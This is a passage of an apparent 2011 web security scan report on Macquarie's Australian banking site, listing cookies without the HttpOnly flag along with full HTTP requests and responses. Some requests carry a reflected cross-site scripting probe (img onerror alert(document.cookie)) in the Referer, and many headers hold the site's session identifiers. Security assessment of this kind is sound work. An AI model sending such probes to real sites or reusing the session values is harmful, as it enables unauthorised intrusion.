x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9wZXJzb25hbC9pbWFnZXMvc3BhY2VyLmdpZg..
Set-Cookie: JSESSIONID=E7DBF741060924D0C7B297B9E5F9DA89; Path=/mgl/au/personal; Secure
Set-Cookie: TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=a74611c34689e2e1c41e28391a98e13836824e21333054354e81df4ca3a2c207ffffffff60ac0ec57d321d21e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

GIF89a.............!.......,...........D..;

4.14. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/high-interest-savings-accounts

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8534D461C63290686E22D26E1E82CBD6; Path=/mgl/au/personal; Secure
TS529c02=2765a8b12f3d12dbabc965e7e126f487a81f016caed108444e81df00aac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=6685503123bcbc56eec66ee7291ab0b036824e21333054354e81db99a3a2c207ffffffff60ac0ec50e54be37; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/savings-accounts/high-interest-savings-accounts HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=771e15074dbb802045577d1b4c90625e36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317134115175; s_sq=mqg-personal%3D%2526pid%253Dpersonal%25253Afinancial-advice%25253Astockbroking%2526pidt%253D1%2526oid%253Dhttps%25253A//www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts%2526ot%253DA%26mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:34:56 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 111957
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9zYXZpbmdzLWFjY291bnRzL2hpZ2gtaW50ZXJlc3Qtc2F2aW5ncy1hY2NvdW50cw..
Set-Cookie: JSESSIONID=8534D461C63290686E22D26E1E82CBD6; Path=/mgl/au/personal; Secure
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=2765a8b12f3d12dbabc965e7e126f487a81f016caed108444e81df00aac4ce84002f3168; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=6685503123bcbc56eec66ee7291ab0b036824e21333054354e81db99a3a2c207ffffffff60ac0ec50e54be37; Max-Age=900; Path=/mgl/au/personal
Content-Length: 111957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie > Pers
...[SNIP]...

4.15. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=CAD63EE04029B14C96D2F9A30296F6B5; Path=/mgl/au/personal; Secure
TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=b777a5470c0eba2c6e756b9bf452eafd36824e21333054354e81db99a3a2c207ffffffff60ac0ec5fff100f8; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage&x=10&y=6 HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.macquarie.com.au/mgl/au/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317133331535; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:33:55 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 109571
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9zZWFyY2gtcmVzdWx0cw..
Set-Cookie: JSESSIONID=CAD63EE04029B14C96D2F9A30296F6B5; Path=/mgl/au/personal; Secure
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=b777a5470c0eba2c6e756b9bf452eafd36824e21333054354e81db99a3a2c207ffffffff60ac0ec5fff100f8; Max-Age=900; Path=/mgl/au/personal
Content-Length: 109571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Results</tit
...[SNIP]...

4.16. https://www.macquarie.com.au/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 52647
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:21 GMT
last-modified: Fri, 09 Sep 2011 22:32:11 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
cache-control: max-age=86400
expires: Wed, 28 Sep 2011 14:36:21 GMT
Set-Cookie: PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=75dfae8b192c3278d033a4a615f72d0036824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fe4c462f05072448f; Max-Age=900; Path=/

if(!window.A4J){window.A4J={};}
function Sarissa(){}
Sarissa.VERSION="0.9.9.3";Sarissa.PARSED_OK="Document contains no parsing errors";Sarissa.PARSED_EMPTY="Document is empty";Sarissa.PARSED_UNKNOWN_
...[SNIP]...

4.17. https://www.macquarie.com.au/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 200 OK
content-length: 2069
content-type: text/javascript
date: Tue, 27 Sep 2011 14:36:20 GMT
last-modified: Fri, 09 Sep 2011 22:27:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0
cache-control: max-age=86400
expires: Wed, 28 Sep 2011 14:36:21 GMT
x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9hNGpfM18yXzEtU05BUFNIT1RvcmcvYWpheDRqc2YvamF2YXNjcmlwdC9zY3JpcHRzL2Zvcm0uanM.
Set-Cookie: PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=6b750404976bd9d43300142d1262f18236824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448fb41d8a4b5072448f; Max-Age=900; Path=/

if(!window.A4J){window.A4J={};}
if(!A4J.findForm){function _JSFFormSubmit(linkId,formName,target,parameters){var form=(typeof formName=='string'?document.getElementById(formName):formName);if(form){v
...[SNIP]...

4.18. https://www.macquarie.com.au/mgl/au/personal/credit-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/credit-cards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/credit-cards HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 114406
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9jcmVkaXQtY2FyZHM.
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie > Pers
...[SNIP]...

4.19. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=95862cd09a9e787d7b47d60b5616e4af211a84e9e41fe7b64e81deebaac4ce84002f3168; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/financial-advice/stockbroking HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage&x=10&y=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=771e15074dbb802045577d1b4c90625e36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317134085507; s_sq=mqg-personal%3D%2526pid%253Dpersonal%25253Asearch-results%2526pidt%253D1%2526oid%253Dhttps%25253A//www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking%2526ot%253DA%26mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:34:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 113506
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9maW5hbmNpYWwtYWR2aWNlL3N0b2NrYnJva2luZw..
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=95862cd09a9e787d7b47d60b5616e4af211a84e9e41fe7b64e81deebaac4ce84002f3168; Max-Age=900; Path=/
Content-Length: 113506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Stockbroking - Macq
...[SNIP]...

4.20. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking/futures

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/financial-advice/stockbroking/futures HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:57 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 127707
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9maW5hbmNpYWwtYWR2aWNlL3N0b2NrYnJva2luZy9mdXR1cmVz
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie Equity Le
...[SNIP]...

4.21. https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/insurance/life-insurance/macquarie-life-active

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/insurance/life-insurance/macquarie-life-active HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:32:03 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 128294
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9pbnN1cmFuY2UvbGlmZS1pbnN1cmFuY2UvbWFjcXVhcmllLWxpZmUtYWN0aXZl
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie Internati
...[SNIP]...

4.22. https://www.macquarie.com.au/mgl/au/personal/retail_portal/templateProxy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/retail_portal/templateProxy.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mgl/au/personal/retail_portal/templateProxy.htm HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
Content-Length: 189
Origin: https://www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage&x=10&y=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; s_cc=true; s_nr=1317133331535; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA; TS529c02=771e15074dbb802045577d1b4c90625e36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

AJAXREQUEST=mppForm%3Aj_id40&mppForm=mppForm&javax.faces.ViewState=j_id2&mppForm%3Aj_id42=mppForm%3Aj_id42&param1=xss%2Binterest%2Bbond%2Bmortgage&param2=&param3=personal&param4=&param5=10&

Response

HTTP/1.1 200 OK
content-length: 1677
content-type: text/xml;charset=UTF-8
date: Tue, 27 Sep 2011 14:34:04 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
ajax-response: true
pragma: no-cache
cache-control: no-cache, must-revalidate, max_age=0, no-store
expires: 0
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9yZXRhaWxfcG9ydGFsL3RlbXBsYXRlUHJveHkuaHRt
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/

<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><link type="text/css" rel="stylesheet" href="/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/richfaces/renderkit/html/css/b
...[SNIP]...

4.23. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/term-deposits/term-deposits

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mgl/au/personal/savings-accounts/term-deposits/term-deposits HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:31:51 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 132726
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
